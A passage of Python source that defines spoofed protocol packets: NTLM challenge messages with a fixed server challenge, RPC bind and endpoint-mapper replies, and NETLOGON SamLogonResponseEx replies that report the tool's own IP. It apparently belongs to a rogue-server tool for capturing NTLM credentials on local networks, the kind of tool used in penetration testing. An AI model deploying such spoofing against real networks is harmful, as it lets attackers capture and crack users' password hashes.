CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
###### RDP Packet Len
|
|
NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
|
|
|
|
##### RDP Len Calculation:
|
|
|
|
self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen))
|
|
self.fields["ASNLen01"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+3)
|
|
self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+6)
|
|
self.fields["MessageIDASNLen2"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+9)
|
|
self.fields["ParserHeadASNLen1"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+12)
|
|
self.fields["PacketStartASNStr"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+20)
|
|
|
|
##### Workstation Offset Calculation:
|
|
self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation))
|
|
self.fields["NTLMSSPNtWorkstationLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtWorkstationMaxLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
##### IvPairs Offset Calculation:
|
|
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtTargetInfoLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
self.fields["NTLMSSPNtTargetInfoMaxLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
##### IvPair Calculation:
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
|
|
#######################################RPC#################################################
|
|
class RPCMapBindAckAcceptedAns(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x05"),
|
|
("VersionLow", "\x00"),
|
|
("PacketType", "\x0c"),#Bind ack.
|
|
("PacketFlag", "\x03"),
|
|
("DataRepresent", "\x10\x00\x00\x00"),
|
|
("FragLen", "\x2c\x02"),
|
|
("AuthLen", "\x00\x00"),
|
|
("CallID", "\x02\x00\x00\x00"),
|
|
("MaxTransFrag", "\xd0\x16"),
|
|
("MaxRecvFrag", "\xd0\x16"),
|
|
("GroupAssoc", "\x26\x2a\x00\x00"),
|
|
("SecondaryAddrLen", "\x04\x00"),
|
|
("SecondaryAddrstr", "\x31\x33\x35\x00"),
|
|
("Padding", "\x00\x00"),
|
|
("CTXNumber", "\x03"),
|
|
("CTXPadding", "\x00\x00\x00"),
|
|
("CTX0ContextID", "\x02\x00"),
|
|
("CTX0ItemNumber", "\x02\x00"),
|
|
("CTX0UID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("CTX0UIDVersion", "\x00\x00\x00\x00"),
|
|
("CTX1ContextID", "\x00\x00"),
|
|
("CTX1ItemNumber", "\x00\x00"),
|
|
("CTX1UID", "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36"),
|
|
("CTX1UIDVersion", "\x00\x00\x00\x00"),
|
|
("CTX2ContextID", "\x03\x00"),
|
|
("CTX2ItemNumber", "\x03\x00"),
|
|
("CTX2UID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("CTX2UIDVersion", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
Data= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["SecondaryAddrLen"])+str(self.fields["SecondaryAddrstr"])+str(self.fields["Padding"])+str(self.fields["CTXNumber"])+str(self.fields["CTXPadding"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX1ContextID"])+str(self.fields["CTX1ItemNumber"])+str(self.fields["CTX1UID"])+str(self.fields["CTX1UIDVersion"])+str(self.fields["CTX2ContextID"])+str(self.fields["CTX2ItemNumber"])+str(self.fields["CTX2UID"])+str(self.fields["CTX2UIDVersion"])
|
|
|
|
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
|
|
|
|
class RPCHeader(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x05"),
|
|
("VersionLow", "\x00"),
|
|
("PacketType", "\x02"),#Bind ack.
|
|
("PacketFlag", "\x03"),
|
|
("DataRepresent", "\x10\x00\x00\x00"),
|
|
("FragLen", "\x0c\x01"),
|
|
("AuthLen", "\x00\x00"),
|
|
("CallID", "\x02\x00\x00\x00"),
|
|
("AllocHint", "\xf4\x00\x00\x00"),
|
|
("ContextID", "\x01\x00"),
|
|
("CancelCount", "\x00"),
|
|
("Padding", "\x00"),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
Data= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["AllocHint"])+str(self.fields["ContextID"])+str(self.fields["CancelCount"])+str(self.fields["Padding"])+str(self.fields["Data"])
|
|
|
|
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
|
|
|
|
|
|
|
|
class RPCMapBindMapperAns(Packet):
|
|
fields = OrderedDict([
|
|
("ContextType", "\x00\x00\x00\x00"),
|
|
("ContextUID", "\x00"*16),
|
|
("MaxTowers", "\x02\x00\x00\x00"),
|
|
("TowerArrMaxCount", "\x04\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TowerArrMaxOff", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TowerArrActualCount", "\x02\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TowerPointer1", "\x03\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TowerPointer2", "\x04\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TowerTotalLen", "\x4B\x00\x00\x00\x00\x00\x00\x00"),
|
|
("Tower1Len", "\x4B\x00\x00\x00"), #Repeat x1 from here
|
|
("Tower1FloorsCount", "\x05\x00"),
|
|
("Tower1ByteCount", "\x13\x00"),
|
|
("Tower1IntUID", "\x0D"),
|
|
("Tower1UID", "\x35\x42\x51\xE3\x06\x4B\xD1\x11\xAB\x04\x00\xC0\x4F\xC2\xDC\xD2"),
|
|
("Tower1Version", "\x04\x00"),
|
|
("Tower1VersionMinBC", "\x02\x00"),
|
|
("Tower1VersionMinimum", "\x00\x00"),
|
|
("Tower2ByteCount", "\x13\x00"),
|
|
("Tower2IntUID", "\x0D"),
|
|
("Tower2UID", "\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60"),
|
|
("Tower2Version", "\x02\x00"),
|
|
("Tower2VersionMinBC", "\x02\x00"),
|
|
("Tower2VersionMinimum", "\x00\x00"),
|
|
("TowerRpcByteCount", "\x01\x00"),
|
|
("TowerRpctIdentifier", "\x0B"),#RPC v5
|
|
("TowerRpcByteCount2", "\x02\x00"),
|
|
("TowerRpcMinimum", "\x00\x00"),
|
|
("TowerPortNumberBC", "\x01\x00"),
|
|
("TowerPortNumberOpcode", "\x07"),#Port is TCP.
|
|
("TowerPortNumberBC2", "\x02\x00"),
|
|
("TowerPortNumberStr", settings.Config.RPCPort), #Port
|
|
("TowerIPAddressBC", "\x01\x00"),
|
|
("TowerIPAddressOpcode", "\x09"),#IPv4 Opcode.
|
|
("TowerIPAddressBC2", "\x04\x00"),
|
|
("TowerIPAddressStr", ""), #IP Address
|
|
("TowerIPNull", "\x00"),
|
|
("Data", ""), #To here, exact same packet.
|
|
("Padding", "\x00"),
|
|
("ErrorCode", "\x00\x00\x00\x00"),# No error.
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["TowerPortNumberStr"] = StructWithLenPython2or3(">H", self.fields["TowerPortNumberStr"])
|
|
self.fields["TowerIPAddressStr"] = RespondWithIPAton()
|
|
|
|
Data= str(self.fields["TowerTotalLen"])+str(self.fields["Tower1Len"])+str(self.fields["Tower1FloorsCount"])+str(self.fields["Tower1ByteCount"])+str(self.fields["Tower1IntUID"])+str(self.fields["Tower1UID"])+str(self.fields["Tower1Version"])+str(self.fields["Tower1VersionMinBC"])+str(self.fields["Tower1VersionMinimum"])+str(self.fields["Tower2ByteCount"])+str(self.fields["Tower2IntUID"])+str(self.fields["Tower2UID"])+str(self.fields["Tower2Version"])+str(self.fields["Tower2VersionMinBC"])+str(self.fields["Tower2VersionMinimum"])+str(self.fields["TowerRpcByteCount"])+str(self.fields["TowerRpctIdentifier"])+str(self.fields["TowerRpcByteCount2"])+str(self.fields["TowerRpcMinimum"])+str(self.fields["TowerPortNumberBC"])+str(self.fields["TowerPortNumberOpcode"])+str(self.fields["TowerPortNumberBC2"])+str(self.fields["TowerPortNumberStr"])+str(self.fields["TowerIPAddressBC"])+str(self.fields["TowerIPAddressOpcode"])+str(self.fields["TowerIPAddressBC2"])+str(self.fields["TowerIPAddressStr"])
|
|
|
|
self.fields["Data"] = Data
|
|
|
|
class NTLMChallenge(Packet):
|
|
fields = OrderedDict([
|
|
("NTLMSSPSignature", "NTLMSSP"),
|
|
("NTLMSSPSignatureNull", "\x00"),
|
|
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
|
|
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
|
|
("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"),
|
|
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
|
|
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
|
|
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
|
|
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
|
|
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
|
|
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
|
|
("NTLMSSPNtWorkstationName", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain),
|
|
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName),
|
|
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName),
|
|
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
|
|
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
###### Convert strings to Unicode first
|
|
self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1')
|
|
|
|
###### Workstation Offset
|
|
CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
|
###### AvPairs Offset
|
|
CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
|
|
|
|
##### Workstation Offset Calculation:
|
|
self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation))
|
|
self.fields["NTLMSSPNtWorkstationLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtWorkstationMaxLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
##### IvPairs Offset Calculation:
|
|
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = StructWithLenPython2or3("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
|
|
self.fields["NTLMSSPNtTargetInfoLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
self.fields["NTLMSSPNtTargetInfoMaxLen"] = StructWithLenPython2or3("<h", len(CalculateLenAvpairs))
|
|
##### IvPair Calculation:
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
|
|
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = StructWithLenPython2or3("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
|
|
|
|
class RPCNTLMNego(Packet):
|
|
fields = OrderedDict([
|
|
("Version", "\x05"),
|
|
("VersionLow", "\x00"),
|
|
("PacketType", "\x0C"),#Bind Ack.
|
|
("PacketFlag", "\x07"),#lastfrag
|
|
("DataRepresent", "\x10\x00\x00\x00"),
|
|
("FragLen", "\xd0\x00"),
|
|
("AuthLen", "\x28\x00"),
|
|
|
|
("CallID", "\x02\x00\x00\x00"),
|
|
("MaxTransFrag", "\xd0\x16"),
|
|
("MaxRecvFrag", "\xd0\x16"),
|
|
("GroupAssoc", "\x94\x2c\x00\x00"),
|
|
("CurrentPortLen", "\x06\x00"),
|
|
("CurrentPortStr", settings.Config.RPCPort),
|
|
("CurrentPortNull", "\x00"),
|
|
("Pcontext", "\x03\x00\x00\x00"),
|
|
("CTX0ContextID", "\x02\x00"),
|
|
("CTX0ItemNumber", "\x02\x00"),
|
|
("CTX0UID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("CTX0UIDVersion", "\x00\x00\x00\x00"),
|
|
|
|
("CTX1ContextID", "\x00\x00"),
|
|
("CTX1ItemNumber", "\x00\x00"),
|
|
("CTX1UID", "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36"),
|
|
("CTX1UIDVersion", "\x01\x00\x00\x00"),
|
|
("CTX2ContextID", "\x03\x00"),
|
|
("CTX2ItemNumber", "\x03\x00"),
|
|
("CTX2UID", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("CTX2UIDVersion", "\x00\x00\x00\x00"),
|
|
("AuthType", "\x0A"), #RPC_C_AUTHN_WINNT
|
|
("AuthLevel", "\x06"),
|
|
("AuthReserved", "\x00\x00"),
|
|
("AuthContextID", "\x00\x00\x00\x00"),
|
|
("Data", ""), #NTLM GOES HERE
|
|
|
|
])
|
|
|
|
def calculate(self):
|
|
|
|
self.fields["AuthLen"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
Data= str(self.fields["Version"])+str(self.fields["VersionLow"])+str(self.fields["PacketType"])+str(self.fields["PacketFlag"])+str(self.fields["DataRepresent"])+str(self.fields["FragLen"])+str(self.fields["AuthLen"])+str(self.fields["CallID"])+str(self.fields["MaxTransFrag"])+str(self.fields["MaxRecvFrag"])+str(self.fields["GroupAssoc"])+str(self.fields["CurrentPortLen"])+str(self.fields["CurrentPortStr"])+str(self.fields["CurrentPortNull"])+str(self.fields["Pcontext"])+str(self.fields["CTX0ContextID"])+str(self.fields["CTX0ItemNumber"])+str(self.fields["CTX0UID"])+str(self.fields["CTX0UIDVersion"])+str(self.fields["CTX1ContextID"])+str(self.fields["CTX1ItemNumber"])+str(self.fields["CTX1UID"])+str(self.fields["CTX1UIDVersion"])+str(self.fields["CTX2ContextID"])+str(self.fields["CTX2ItemNumber"])+str(self.fields["CTX2UID"])+str(self.fields["CTX2UIDVersion"]) +str(self.fields["AuthType"])+str(self.fields["AuthLevel"])+str(self.fields["AuthReserved"])+str(self.fields["AuthContextID"])+str(self.fields["Data"])
|
|
|
|
self.fields["FragLen"] = StructWithLenPython2or3("<h",len(Data))
|
|
|
|
################### Mailslot NETLOGON ######################
|
|
class NBTUDPHeader(Packet):
|
|
fields = OrderedDict([
|
|
("MessType", "\x11"),
|
|
("MoreFrag", "\x02"),
|
|
("TID", "\x82\x92"),
|
|
("SrcIP", "0.0.0.0"),
|
|
("SrcPort", "\x00\x8a"), ##Always 138
|
|
("DatagramLen", "\x00\x00"),
|
|
("PacketOffset", "\x00\x00"),
|
|
("ClientNBTName", ""),
|
|
("DstNBTName", ""),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["SrcIP"] = RespondWithIPAton()
|
|
## DatagramLen.
|
|
DataGramLen = str(self.fields["PacketOffset"])+str(self.fields["ClientNBTName"])+str(self.fields["DstNBTName"])+str(self.fields["Data"])
|
|
self.fields["DatagramLen"] = StructWithLenPython2or3(">h",len(DataGramLen))
|
|
|
|
class SMBTransMailslot(Packet):
|
|
fields = OrderedDict([
|
|
("Wordcount", "\x11"),
|
|
("TotalParamCount", "\x00\x00"),
|
|
("TotalDataCount", "\x00\x00"),
|
|
("MaxParamCount", "\x02\x00"),
|
|
("MaxDataCount", "\x00\x00"),
|
|
("MaxSetupCount", "\x00"),
|
|
("Reserved", "\x00"),
|
|
("Flags", "\x00\x00"),
|
|
("Timeout", "\xff\xff\xff\xff"),
|
|
("Reserved2", "\x00\x00"),
|
|
("ParamCount", "\x00\x00"),
|
|
("ParamOffset", "\x00\x00"),
|
|
("DataCount", "\x00\x00"),
|
|
("DataOffset", "\x00\x00"),
|
|
("SetupCount", "\x03"),
|
|
("Reserved3", "\x00"),
|
|
("Opcode", "\x01\x00"),
|
|
("Priority", "\x00\x00"),
|
|
("Class", "\x02\x00"),
|
|
("Bcc", "\x00\x00"),
|
|
("MailSlot", "\\MAILSLOT\\NET\\NETLOGON"),
|
|
("MailSlotNull", "\x00"),
|
|
("Padding", "\x00\x00\x00"),
|
|
("Data", ""),
|
|
])
|
|
|
|
def calculate(self):
|
|
#Padding
|
|
if len(str(self.fields["Data"]))%2==0:
|
|
self.fields["Padding"] = "\x00\x00\x00\x00"
|
|
else:
|
|
self.fields["Padding"] = "\x00\x00\x00"
|
|
BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"])
|
|
PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])
|
|
|
|
self.fields["DataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
self.fields["TotalDataCount"] = StructWithLenPython2or3("<h",len(str(self.fields["Data"])))
|
|
self.fields["DataOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
|
|
self.fields["ParamOffset"] = StructWithLenPython2or3("<h",len(PacketOffsetLen)+32)
|
|
self.fields["Bcc"] = StructWithLenPython2or3("<h",len(BccLen))
|
|
|
|
class SamLogonResponseEx(Packet):
|
|
fields = OrderedDict([
|
|
("Cmd", "\x17\x00"),
|
|
("Sbz", "\x00\x00"),
|
|
("Flags", "\xfd\x03\x00\x00"),
|
|
("DomainGUID", "\xe7\xfd\xf2\x4a\x4f\x98\x8b\x49\xbb\xd3\xcd\x34\xc7\xba\x57\x70"),
|
|
("ForestName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
|
|
("ForestNameNull", "\x00"),
|
|
("ForestDomainName", "\x04\x73\x6d\x62\x33\x05\x6c\x6f\x63\x61\x6c"),
|
|
("ForestDomainNull", "\x00"),
|
|
("DNSName", "\x0a\x73\x65\x72\x76\x65\x72\x32\x30\x30\x33"),
|
|
("DNSPointer", "\xc0\x18"),
|
|
("DomainName", "\x04\x53\x4d\x42\x33"),
|
|
("DomainTerminator", "\x00"),
|
|
("ServerLen", "\x0a"),
|
|
("ServerName", settings.Config.MachineName),
|
|
("ServerTerminator", "\x00"),
|
|
("UsernameLen", "\x10"),
|
|
("Username", settings.Config.Username),
|
|
("UserTerminator", "\x00"),
|
|
("SrvSiteNameLen", "\x17"),
|
|
("SrvSiteName", "Default-First-Site-Name"),
|
|
("SrvSiteNameNull", "\x00"),
|
|
("Pointer", "\xc0"),
|
|
("PointerOffset", "\x5c"),
|
|
("DCAddrSize", "\x10"),
|
|
("AddrType", "\x02\x00"),
|
|
("Port", "\x00\x00"),
|
|
("DCAddress", "\xc0\xab\x01\x65"),
|
|
("SinZero", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("Version", "\x0d\x00\x00\x00"),
|
|
("LmToken", "\xff\xff"),
|
|
("LmToken2", "\xff\xff"),
|
|
])
|
|
|
|
def calculate(self):
|
|
Offset = str(self.fields["Cmd"])+str(self.fields["Sbz"])+str(self.fields["Flags"])+str(self.fields["DomainGUID"])+str(self.fields["ForestName"])+str(self.fields["ForestNameNull"])+str(self.fields["ForestDomainName"])+str(self.fields["ForestDomainNull"])+str(self.fields["DNSName"])+str(self.fields["DNSPointer"])+str(self.fields["DomainName"])+str(self.fields["DomainTerminator"])+str(self.fields["ServerLen"])+str(self.fields["ServerName"])+str(self.fields["ServerTerminator"])+str(self.fields["UsernameLen"])+str(self.fields["Username"])+str(self.fields["UserTerminator"])
|
|
|
|
DcLen = str(self.fields["AddrType"])+str(self.fields["Port"])+str(self.fields["DCAddress"])+str(self.fields["SinZero"])
|
|
self.fields["DCAddress"] = RespondWithIPAton()
|
|
self.fields["ServerLen"] = StructWithLenPython2or3("<B",len(str(self.fields["ServerName"])))
|
|
self.fields["UsernameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["Username"])))
|
|
self.fields["SrvSiteNameLen"] = StructWithLenPython2or3("<B",len(str(self.fields["SrvSiteName"])))
|
|
self.fields["DCAddrSize"] = StructWithLenPython2or3("<B",len(DcLen))
|
|
self.fields["PointerOffset"] = StructWithLenPython2or3("<B",len(Offset))
|
|
|